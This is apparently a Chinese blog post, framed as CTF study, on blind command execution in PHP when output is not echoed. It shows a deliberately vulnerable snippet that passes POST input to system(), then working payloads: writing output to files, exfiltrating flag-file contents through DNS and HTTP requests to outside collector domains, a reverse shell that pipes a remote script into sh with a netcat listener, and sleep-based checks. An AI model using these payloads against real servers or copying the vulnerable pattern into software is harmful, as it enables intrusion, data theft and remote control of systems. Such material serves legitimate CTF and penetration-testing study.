php--无回显情况下的命令执行

免责声明:本文仅做技术交流与学习...

目录

绕过模版:

[1. 写入文件、二次返回:](#1. 写入文件、二次返回:)

[2. DNS信道:](#2. DNS信道:)

3.http信道:

[4.反弹shell信道 -->公网IP](#4.反弹shell信道 -->公网IP)

[5.延时 sleep 3](#5.延时 sleep 3)


建立通道(信道) --数据传输的路径

shell_exec 与 system 相比,shell_exec没有回显结果.

绕过模版:

<?php

echo "hello world";

命令执行:

cmd=_POST'cmd';

system($cmd);

?>

1. 写入文件、二次返回:

/?cmd=whoami>1.txt

再访问1.txt:

/?cmd=cat fl?g.php>1.txt


2. DNS信道:

dnslog.cn

/?cmd=ping -c 1 `执行命令`.域名 --1次解析

/?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:0:10}.域名 --一次带出的字符有限.

/?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:10:30}.域名

/?cmd=a=`sed -n "3,4p" fla?.php|base64`;curl${a:10:30}.域名 --base64编码


3.http信道:

https://requestrepo.com/#/

https://requestrepo.com/#/

(看get请求包)

/?cmd=curl http://域名/?1=\`ls .|base64`

/?cmd=curl http://域名/?1=\`cat fl?g.php|base64`


4.反弹shell信道 -->公网IP

https://your-shell.com/

https://your-shell.com/

(用微软的浏览器访问.)

curl https://your-shell.com/\<your公网ip>:1337 | sh

/?cmd=curl https://your-shell.com/\<your公网ip>:1337 | sh

服务器: nc -lvvnp 1337


5.延时 sleep 3

--麻烦啊

&2=sleep 3 ||还可验证命令执行.


相关推荐
哥不想学算法4 小时前
【C++】字符串字面量拼接
开发语言·c++
不像程序员的程序媛5 小时前
系统cpu内存负载资源分析
运维·服务器·数据库
带娃的IT创业者5 小时前
突破算力与安全的边界:深度解析 Mythos AI 的“受信发布”机制与技术影响
人工智能·安全·大语言模型·ai安全·mythos ai·受信发布·ai监管
落寞的星星6 小时前
引言:加密不等于安全
安全
gugucoding6 小时前
21. 【C语言】打包不同类型:结构体
c语言·开发语言
Brookty6 小时前
【JavaEE】线程安全(一).4:写块串行保安全、CAS
java·开发语言·java-ee·多线程·线程安全
SRET6 小时前
Mineradio 沙盒隔离安装完全指南 | 一键安全运行 Electron 应用!!!
javascript·经验分享·安全·electron·aigc·音视频·ai编程
全栈前端老曹6 小时前
【MongoDB】安全与权限管理 —— 用户认证、角色权限、SSL 加密
前端·javascript·数据库·安全·mongodb·nosql·ssl
星河耀银海6 小时前
大模型安全:对抗攻击与防御方法
人工智能·安全·大模型